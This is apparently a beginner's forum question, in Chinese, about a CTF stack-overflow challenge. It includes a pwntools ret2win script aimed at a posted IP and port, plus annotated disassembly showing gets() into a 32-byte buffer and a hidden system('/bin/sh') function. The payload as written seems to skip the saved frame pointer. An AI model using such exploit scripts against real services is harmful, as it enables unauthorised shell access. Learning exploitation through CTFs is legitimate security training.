from pwn import *
# Open a TCP connection to the challenge service (host and port as posted).
conn = remote('47.100.53.148', 10101)

# Payload layout: 32 filler bytes, then 0x4005B6 packed by p64() into
# 8 bytes. 0x4005B6 is the address of `bin` in the listing below.
filler = ('a' * 32).encode('utf-8')
payload = filler + p64(0x4005B6)

# sendline() appends a newline after the payload.
conn.sendline(payload)

# Attach the terminal to the socket.
# NOTE(review): "Got EOF while reading in interactive" is pwntools reporting
# that the remote end closed the connection.
conn.interactive()
小白第一次做 pwn 题目,这是我参考网上的脚本写的,运行后出现 "Got EOF while reading in interactive",是脚本有问题吗?
; bin: loads the address of the "/bin/sh" string into edi and calls system(),
; i.e. it starts a shell. main in this excerpt never references bin.
; Defensive note: a shell-spawning helper left in a network-facing binary turns
; any control-flow corruption into command execution; it should not ship.
.text:00000000004005B6
.text:00000000004005B6 ; Attributes: bp-based frame
.text:00000000004005B6
.text:00000000004005B6 public bin
.text:00000000004005B6 bin proc near
.text:00000000004005B6 ; __unwind {
.text:00000000004005B6 push rbp ; save caller's frame pointer
.text:00000000004005B7 mov rbp, rsp ; set up this frame
.text:00000000004005BA mov edi, offset command ; "/bin/sh"
.text:00000000004005BF mov eax, 0 ; eax cleared before the call
.text:00000000004005C4 call _system ; system("/bin/sh")
.text:00000000004005C9 nop
.text:00000000004005CA pop rbp ; restore caller's frame pointer
.text:00000000004005CB retn
.text:00000000004005CB ; } // starts at 4005B6
.text:00000000004005CB bin endp
.text:00000000004005CB
.text:00000000004005CC
; main: prints a banner, reads one line from stdin into the 0x20-byte stack
; buffer var_20 with gets(), prints a second message and returns.
; Security: gets() takes no length argument, so a line longer than 0x20 bytes
; is written past var_20 into the saved rbp and the return address stored
; above it in this frame (stack buffer overflow). No stack-canary check is
; visible before leave/retn. The source-level fix is a bounded read such as
; fgets(buf, sizeof buf, stdin); building with a stack protector adds detection.
.text:00000000004005CC ; =============== S U B R O U T I N E =======================================
.text:00000000004005CC
.text:00000000004005CC ; Attributes: bp-based frame
.text:00000000004005CC
.text:00000000004005CC ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:00000000004005CC public main
.text:00000000004005CC main proc near ; DATA XREF: _start+1D↑o
.text:00000000004005CC
.text:00000000004005CC var_20 = byte ptr -20h
.text:00000000004005CC
.text:00000000004005CC ; __unwind {
.text:00000000004005CC push rbp ; save caller's frame pointer
.text:00000000004005CD mov rbp, rsp ; set up this frame
.text:00000000004005D0 sub rsp, 20h ; reserve 0x20 bytes of locals (var_20)
.text:00000000004005D4 mov edi, offset s ; "Welcome to MCTF, and welcome to ZJPC."
.text:00000000004005D9 call _puts
.text:00000000004005DE lea rax, [rbp+var_20] ; rax = address of the buffer at rbp-0x20
.text:00000000004005E2 mov rdi, rax ; buffer address is the argument to gets
.text:00000000004005E5 mov eax, 0
.text:00000000004005EA call _gets ; unbounded read into the 0x20-byte buffer
.text:00000000004005EF mov edi, offset aCanUHackIn ; "Can u hack in?"
.text:00000000004005F4 call _puts
.text:00000000004005F9 nop
.text:00000000004005FA leave ; rsp = rbp, then pop rbp
.text:00000000004005FB retn ; returns through the address stored on the stack
.text:00000000004005FB ; } // starts at 4005CC
.text:00000000004005FB main endp
这是反汇编的代码,主要部分就是main和bin函数了
有相应的源码吗?